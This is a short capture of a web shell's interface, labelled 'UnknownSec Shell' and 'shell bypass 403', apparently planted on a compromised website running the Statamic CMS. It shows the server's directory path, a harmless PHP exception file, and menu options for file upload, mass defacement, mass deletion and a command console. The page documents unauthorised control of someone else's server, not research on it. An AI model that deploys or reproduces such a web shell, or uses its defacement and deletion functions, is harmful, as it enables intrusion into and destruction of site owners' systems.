shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Exceptions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
AssetNotFoundException.php
<?php namespace Statamic\Exceptions; class AssetNotFoundException extends \Exception { protected $asset; public function __construct($asset) { parent::__construct("Asset [{$asset}] not found"); $this->asset = $asset; } }
© 2026 UnknownSec